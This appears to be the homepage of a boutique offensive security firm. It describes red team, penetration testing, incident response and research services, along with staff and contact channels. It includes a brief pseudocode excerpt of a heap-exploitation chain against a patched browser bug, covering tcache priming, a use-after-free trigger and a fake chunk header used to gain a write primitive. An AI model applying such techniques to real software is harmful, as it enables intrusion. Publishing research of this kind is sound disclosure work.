vector // offensive security // est. 2017
We test what your blue team hopes you never need.
Vector is a boutique offensive firm. Red team, penetration testing, incident response, and original research. We work with security teams who already understand the discipline and want operator perspective, not consultant decks.
// services
Four practices. Each one signed off by the principal who runs it.
S-01
Red team
Adversary emulation against your live environment. Goal-driven, scoped to objectives, reported with timeline and indicators.
- Initial access, persistence, lateral movement
- Custom tradecraft when off-the-shelf gets caught
- Detection coverage written up against your SIEM
S-02
Penetration testing
Application and infrastructure tests with vulnerability severity reasoned, not auto-scored. We tell you what would actually be exploited next quarter.
- Web, mobile, and API surface tests
- Internal and external network engagements
- Cloud configuration review across AWS, GCP, Azure
S-03
Incident response
Retainer or surge engagement for live incidents. Forensic acquisition, scoping, containment, and a written post-incident report you can use.
- First contact within four hours of retainer call
- Counsel-friendly evidence handling
- Full timeline reconstruction with artifacts
S-04
Research
Original vulnerability research and capability development. We publish what we can, hold what we cannot, and credit responsibly when third-party work informs ours.
- CVE-tracked disclosures across browsers and runtimes
- Conference talks at DEF CON, Black Hat, Recon
- Internal capability libraries used in red team
// research
An excerpt from CVE-2026-2117: a chained allocator path.
Published three weeks ago against a fixed, current major browser. The full writeup, exploitation video, and patch analysis are in the research directory.
# heap layout primer (target build, x86_64)
size = 0x70 # falls into Tcache bin idx 6
align = 0x10 # malloc returns 16-byte aligned chunks
goal = overlap freed buffer with adjacent in-use buffer
# step 1: prime tcache idx 6 with 7 freed chunks
for i in range(7):
free(alloc(0x70))
# step 2: trigger UAF via path A (see report sec 3.2)
trigger_a()
# step 3: place fake chunk header inside attacker-controlled mmap
# attacker-controlled length tricks subsequent realloc()
# into returning into the fake header region
fake_chunk[0x8] = 0x71 # size + prev_inuse
fake_chunk[0x10] = leaked_lib_addr ^ tcache_key
# step 4: subsequent allocation returns into mapped region.
# write primitive achieved.We held disclosure 47 days past patch ship to give downstream distributions time to backport. The bounty was donated to the EFF in the reporter's name.
// engagements
Names get redacted. Outcomes do not.
Most engagements are under NDA. We publish work only when the client agrees, or when responsible disclosure has run its course. The list below is the redacted roster of the last eighteen months.
- [REDACTED] // FORTUNE 50 RETAILER
- [REDACTED] // PUBLIC INFRASTRUCTURE
- [REDACTED] // EU PAYMENTS PLATFORM
- [REDACTED] // CRITICAL HEALTHCARE
- [REDACTED] // FAANG ADJACENT
- [REDACTED] // SOVEREIGN AGENCY
- [REDACTED] // AEROSPACE PRIME
- [REDACTED] // DOMESTIC TELCO
// who you work with
No bench. The people who run the firm run the engagements.
@ks
Principal, Red Team
Twelve years offensive. Previously at a federal contractor. Speaks at Recon. Maintains the in-house C2 framework.
@ml
Principal, Application Security
Background in compiler internals. Wrote the team's fuzzing harness. Three browser CVEs since 2022.
@rh
Director, Incident Response
Spent six years on the response side of nation-state intrusions. Coordinates retainers and surge calls.
Most security firms grow until the people on the proposal are not the people on the engagement. We do not. If you sign with Vector, the operator named on the SOW is in the kickoff, in the daily standup, and writing the report by hand.
We will turn down a piece of work before we hand it to someone who has not done it. That is the shape of the firm.
// the principals
// engage
How to reach us.
Mastodon
@vector@infosec.exchange
For research, conference, and disclosure threads.
Signal
+1 415 555 0042
Initial scoping for retainer or incident calls. PGP on request.
In person
San Francisco, Berlin, Toronto
We come to your office for kickoff. We do not host clients in ours.
We do not run a contact form. We do not respond to LinkedIn messages. Pick a channel above.